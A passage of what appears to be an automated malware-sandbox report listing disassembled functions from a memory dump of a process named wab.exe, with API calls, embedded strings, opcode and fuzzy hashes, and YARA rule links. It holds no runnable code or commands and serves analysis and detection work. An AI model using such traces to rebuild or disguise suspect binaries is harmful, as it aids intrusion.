                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                                          • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                                          • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                          • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$wcslen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 239872665-3916222277
                                                                                                                                                                                                          • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                          • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                          • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 59245283-0
                                                                                                                                                                                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3467550082-0
                                                                                                                                                                                                          • Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
